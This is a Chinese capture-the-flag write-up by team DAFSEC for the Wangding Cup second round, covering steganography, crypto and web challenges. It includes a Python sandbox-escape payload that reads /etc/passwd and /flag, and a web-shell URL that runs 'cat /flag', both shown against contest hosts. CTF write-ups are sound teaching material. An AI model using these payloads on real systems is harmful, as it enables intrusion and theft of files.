网鼎杯网络安全大赛第二场Writeup

战队:DAFSEC

签到

falg{wangdingbei_nice}

2、套娃misc 

直接对第6张图分析

Lsb解密工具

https://github.com/RobinDavid/LSB-Steganography

或者用jar工具

flag{03a253f5-8e93-4533-bcfc-af908830095d}

3、calc web

http://563cb152029345af896e74c68373902a8b016d45e5004624.game.ichunqiu.com/

得到提示计算失败。 go away hacker!

猜测可能是“python继承链

 

参考链接:https://bestwing.me/2018/05/03/awesome-python-sandbox-in-ciscn/

EXP:

1+1+int(([].__class__.__base__.__subclasses__()[40](‘/etc/passwd’,’r’).read()).encode(‘utf-8’),16)

可以读取/etc/passwd,尝试读取flag文件

1+1+int(([].__class__.__base__.__subclasses__()[40](‘/flag’,’r’).read()).encode(‘utf-8’),16)

获取到flag

flag{a19d4d8c-28b2-47cb-8596-bcd3ccaa6000}

4、wafUpload Web

抓包上传

得到shell地址,密码a,发现flag在根目录下面

获取flag

http://253eb79e1cbc46a99c3b625627967d73040c5768b3bb49f6.game.ichunqiu.com/upload/85ed06a27b8eb105c27cbc380822ede8/php.php?a=cat%20/flag

 

flag{d3035876-aaab-45ef-8ed2-2f30a390230c}

5、fgo-pwn

这题目是原题。附上wp 的地址:https://blog.csdn.net/qq_35429581/article/details/78231443 

获取到flag

flag{a0f0ca83ab33bf935f01164dd625dde8}

6、hvm-pwn


7、lovely_AES- Crypto


解题思路,利用padding oracle 能够得到后两段明文,第一段只能解出来中间值,由于不知道初始iv,猜测明文第一个字节为f,得到ivS,怀疑iv就是 16S

flag{Padding_oracle&Flipped_Bits}

8、神奇二叉树 Crypto

发现readme存在奇怪的字符串,尝试base64解密

得到

1.这是一棵红黑树

2.树从1-59上的果子依次为 ek`~3c:gf017b744/b38fd~abm7g5489e2{lf6z8d16hae`98}b|-21m.e:

3.依次从树上取走第 18,35,53,50,14,28,19,6,54,36 个果子,过程中保持红黑树性质不变

4.tmpflag为第 8,56,47,37,52,34,17,8,8,29,7,47,40,57,46,24,34,34,57,29,22,5,16,57,24,29,8,12,57,12,12,21,33,34,55,51,22,45,34,31,1,23 个果子

5.flag为 tmpflag 红色果子 ASCII +1 , 黑色果子 ASCII-1

6.让我们愉快的开始获取flag

 

替换得到flag为:

flag{10ff49a7_db11_4e43_b4f6_66ef12ceb19d}


9、easyFMT- PWN


flag{d190569301659734e8536479a43a8199}